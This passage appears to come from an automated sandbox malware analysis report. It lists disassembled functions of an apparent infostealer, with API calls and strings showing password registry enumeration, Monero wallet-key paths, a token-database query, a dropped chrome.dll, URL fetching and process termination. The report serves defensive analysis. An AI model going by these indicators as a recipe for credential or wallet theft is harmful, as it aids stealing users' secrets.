                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 2356445960-393685449
                          • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                          • Instruction ID: 29296ba2ddacb06b9ea6b63f42aa04cd5b3c241e2f39aa38b45738dfd55a0363
                          • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                          • Instruction Fuzzy Hash: 41B1577180120DEFCF25DFE4C885AAEBBB5BF1A310F14416AE9156B212D731EE51CB91
                          Function 00027330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0002739A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00027411
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0002746D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 000274B2
                          • HeapFree.KERNEL32(00000000), ref: 000274B9
                          • task.LIBCPMTD ref: 000275B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: ebc68716df4ebba032fa9239341cadf7036846247770f340c4a5ac698c76066b
                          • Instruction ID: 00e706a23083b63db687177f799a9528b51141a6258ee152811fcbc3d573ae1b
                          • Opcode Fuzzy Hash: ebc68716df4ebba032fa9239341cadf7036846247770f340c4a5ac698c76066b
                          • Instruction Fuzzy Hash: D8610BB59041689BDB24DF50DC55FEAB7B8BF48300F0085E9E649A6142EFB06BC9CF90
                          Function 0002BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          • lstrlen.KERNEL32(00000000), ref: 0002BC6F
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0002BC9D
                          • lstrlen.KERNEL32(00000000), ref: 0002BD75
                          • lstrlen.KERNEL32(00000000), ref: 0002BD89
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: a88181a02b255a2aea360960134c61224815f4907deae8beaf97e3ce89f62b27
                          • Instruction ID: 529e8b8f0979dd3b3d537e67986d24c3f310dc416f5ab3e4ad58652399167a63
                          • Opcode Fuzzy Hash: a88181a02b255a2aea360960134c61224815f4907deae8beaf97e3ce89f62b27
                          • Instruction Fuzzy Hash: 41B13272A101189BCF15FBA0DDA6EEEB33DAF55300F404568F54666193EF346A48CB72
                          Function 00036A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 9567c73410f85a032434e67812bf169da60661bb12bf5962d6d6619f7cf12e7c
                          • Instruction ID: 8bb244f900dba9c5bf6c7a9b87fd78612df874bec74aa9253d6346a8c69f1755
                          • Opcode Fuzzy Hash: 9567c73410f85a032434e67812bf169da60661bb12bf5962d6d6619f7cf12e7c
                          • Instruction Fuzzy Hash: 47F05E3090C209EFD3449FE4F80D7ADBB74EB04757F1181A5F60D96190C6714A60EF51
                          Function 000308A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 00039850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,000308DC,C:\ProgramData\chrome.dll), ref: 00039871
                            • Part of subcall function 0002A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0002A098
                          • StrCmpCA.SHLWAPI(00000000,00FD9298), ref: 00030922
                          • StrCmpCA.SHLWAPI(00000000,00FD9148), ref: 00030B79
                          • StrCmpCA.SHLWAPI(00000000,00FD9208), ref: 00030A0C
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00030C35
                          Strings
                          • C:\ProgramData\chrome.dll, xrefs: 00030C30
                          • C:\ProgramData\chrome.dll, xrefs: 000308CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                          • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                          • API String ID: 585553867-663540502
                          • Opcode ID: 53425cae8beff00297983b40f27f38af81ae03e6c7b3a3afae032492d8bb78c0
                          • Instruction ID: 9d3b26ec1adf5280ce0d624e7b15cb63cbfd3c06a79b3b8fcf34c844cb57e0d3
                          • Opcode Fuzzy Hash: 53425cae8beff00297983b40f27f38af81ae03e6c7b3a3afae032492d8bb78c0
                          • Instruction Fuzzy Hash: 6CA137717001089FCB28EF64D996EED777AEF95300F50856DE84A9F252DB30DA05CB92
                          Function 00029E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                          • wsprintfA.USER32 ref: 00029E7F
                          • lstrcat.KERNEL32(00000000,?), ref: 00029F03
                          • lstrcat.KERNEL32(00000000,?), ref: 00029F17
                          • lstrcat.KERNEL32(00000000,000412D8), ref: 00029F29
                          • lstrcpy.KERNEL32(?,00000000), ref: 00029F7C
                          • Sleep.KERNEL32(00001388), ref: 0002A013
                            • Part of subcall function 000399A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000399C5
                            • Part of subcall function 000399A0: Process32First.KERNEL32(0002A056,00000128), ref: 000399D9
                            • Part of subcall function 000399A0: Process32Next.KERNEL32(0002A056,00000128), ref: 000399F2
                            • Part of subcall function 000399A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00039A4E
                            • Part of subcall function 000399A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00039A6C
                            • Part of subcall function 000399A0: CloseHandle.KERNEL32(00000000), ref: 00039A79
                            • Part of subcall function 000399A0: CloseHandle.KERNEL32(0002A056), ref: 00039A88
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                          • String ID: D
                          • API String ID: 531068710-2746444292
                          • Opcode ID: 88beca3de0f874d86eb91083941e481b5116a0e4ac244c6656b6748d7afeffcd
                          • Instruction ID: c1e71de5d1cf21b98077ac8defab1c9485fbdcc93d1ac97b8f7762dcc3c1ec29
                          • Opcode Fuzzy Hash: 88beca3de0f874d86eb91083941e481b5116a0e4ac244c6656b6748d7afeffcd
                          • Instruction Fuzzy Hash: 545156B1944318ABEB25DB60DC4AFDA777CAF44704F004598B60DAB281EB75AB84CF51
                          Function 0009F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 0009FA1F
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0009FA27
                          • _ValidateLocalCookies.LIBCMT ref: 0009FAB0
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0009FADB
                          • _ValidateLocalCookies.LIBCMT ref: 0009FB30
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                          • Instruction ID: 69e5939d38b8d654f40b121c61783e43f056d884084cc64ac4086b518e7f515b
                          • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                          • Instruction Fuzzy Hash: B2419270A0021AEBCF10DF68C884AEEBBF5BF49324F148165E818EB392D731D915DB91
                          Function 00025000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002501A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00025021
                          • InternetOpenA.WININET(00040DE3,00000000,00000000,00000000,00000000), ref: 0002503A
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00025061
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00025091
                          • InternetCloseHandle.WININET(?), ref: 00025109
                          • InternetCloseHandle.WININET(?), ref: 00025116
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 8252892ccb73cb0df9f2fcf3a745c08b731cd46193ec2a618d0a39d7993a62d6
                          • Instruction ID: 2a394ca3dd4465bfb7c8940e44031826b5825c1840cca3930df46dd43fc54b3e
                          • Opcode Fuzzy Hash: 8252892ccb73cb0df9f2fcf3a745c08b731cd46193ec2a618d0a39d7993a62d6
                          • Instruction Fuzzy Hash: 6731EEB4A44218ABDB20CF54DC85BEDB7B4AB48305F1081E9F709A7281D7706EC5CF99
                          Function 0003856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000385B6
                          • wsprintfA.USER32 ref: 000385E9
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0003860B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0003861C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00038629
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          • RegQueryValueExA.ADVAPI32(00000000,00FDE440,00000000,000F003F,?,00000400), ref: 0003867C
                          • lstrlen.KERNEL32(?), ref: 00038691
                          • RegQueryValueExA.ADVAPI32(00000000,00FDE380,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00040B3C), ref: 00038729
                          • RegCloseKey.ADVAPI32(00000000), ref: 00038798
                          • RegCloseKey.ADVAPI32(00000000), ref: 000387AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: a1a15f728e28e04f4a46e8ccbec96914af9de86cdac3736e7a745a95a765b9c7
                          • Instruction ID: 4d0afa12dca91ea1c34c7b5ce421b6331fd6cdda7594edb2346edc672f198ae7
                          • Opcode Fuzzy Hash: a1a15f728e28e04f4a46e8ccbec96914af9de86cdac3736e7a745a95a765b9c7
                          • Instruction Fuzzy Hash: 8021E971A14218ABDB64DB54DC85FE9B3B9FB48710F10C1E8F609A6180DF71AA85CFE4
                          Function 000399A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000399C5
                          • Process32First.KERNEL32(0002A056,00000128), ref: 000399D9
                          • Process32Next.KERNEL32(0002A056,00000128), ref: 000399F2
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00039A4E
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00039A6C
                          • CloseHandle.KERNEL32(00000000), ref: 00039A79
                          • CloseHandle.KERNEL32(0002A056), ref: 00039A88
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
